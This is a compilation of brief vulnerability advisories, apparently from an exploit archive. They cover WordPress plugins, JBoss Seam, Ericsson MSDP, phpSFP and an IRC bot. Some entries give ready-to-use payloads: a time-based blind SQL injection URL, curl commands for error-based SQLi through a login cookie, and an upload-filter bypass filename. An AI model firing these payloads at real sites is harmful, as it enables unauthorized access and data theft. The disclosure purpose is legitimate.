ShareaholicAdmin::add_location is accessible for every registered user. $_POST['location'] is not escaped which allows an attacker to inject malicious JavaScript code.
WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability. There are some pages with wordpress esc_sql function. esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/). PoC: http://VICTIM/wp-admin/admin.php?page=aiowpsec_list_locked_ips&orderby=id%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))vLhA)%20AND%20%27QNKk%27=%27QNKk
Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This module leverages RCE to upload and execute a meterpreter payload. Versions of the JBoss AS admin-console are known to be vulnerable to this exploit, without requiring authentication. Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7. This module provides a more efficient method of exploitation - it does not loop to find desired Java classes and methods.
Pitbull-w3tw0rk_hunter is a POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.
Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.
Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.
The videowhisper-video-conference-integration wordpress plugin v4.91.8 allows various remote unauthenticated file uploads, among the file types is html where the last 4 characters are only being checked in a file name to match which types are allowed. Because of this .shtml can be passed through and remote code execution is SSI is allowed. The code does not do any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress site: .shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps. The if (strstr($filename,'.php')) exit; can be by passed by using the extension .Php but the file extension check would allow files like test.Php.shtml.
Allows various remote unauthenticated file uploads, among the file types is html where the last 4 characters are only being checked in a file name to match which types are allowed. Because of this .shtml can be passed through and remote code execution if SSI is allowed. The code does not do any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress site: .shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps. The if (strstr($filename,'.php')) exit; can be by passed by using the extension .Php but the file extension check would allow files like test.Php.shtml
There are many possible ways to do SQLi, I will go with error-based which enabled by default on phpSFP xD $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,user())) or '1|||1" in case you don't know, for further queries you have to change 'user()' to something else, e.g. $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,database())) or '1|||1"
A vulnerability in the Wordpress plugin Simple Ads Manager allows an attacker to gain access to sensitive information such as user and author details, categories, tags, posts, and stats. The vulnerable file is simple-ads-manager/sam-ajax-admin.php and the vulnerable function is load_users. An attacker can exploit this vulnerability by sending a POST request to the vulnerable file with the action parameter set to load_users.
Services By CQR